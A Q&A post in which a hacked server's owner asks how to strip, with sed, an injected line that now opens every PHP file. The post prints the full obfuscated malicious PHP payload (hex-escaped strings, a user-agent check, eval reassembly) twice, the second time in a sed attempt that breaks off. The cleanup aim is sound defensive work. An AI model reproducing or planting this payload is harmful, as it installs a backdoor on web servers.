# Remove specific (complex) line from MANY files (sed?)

Tags: regex, bash, sed, grep

Server was hacked, every php file on the server now starts with malicious code:

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\57\x2a\40\x74\150\x6f\157\x63\172\x77\144\x78\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x32\71\x35\55\x32\60\x33\51\x29\54\x20\153\x73\143\x70\167\x78\172\x75\150\x72\50\x24\151\x62\156\x75\167\x67\162\x61\157\x64\54\x24\172\x64\163\x6e\160\x62\172\x67\150\x65\51\x29\51\x3b\40\x2f\52\x20\156\x6f\153\x7a\142\x6d\165\x76\165\x6e\40\x2a\57\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>
```

I want to write a sed script to search for this pattern and delete it. However, whatever I write ends up failing due to some of these special characters. Is there a way to search for this as a string literal and replace with nothing?

What I have tried so far is:

```
sed -i 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return 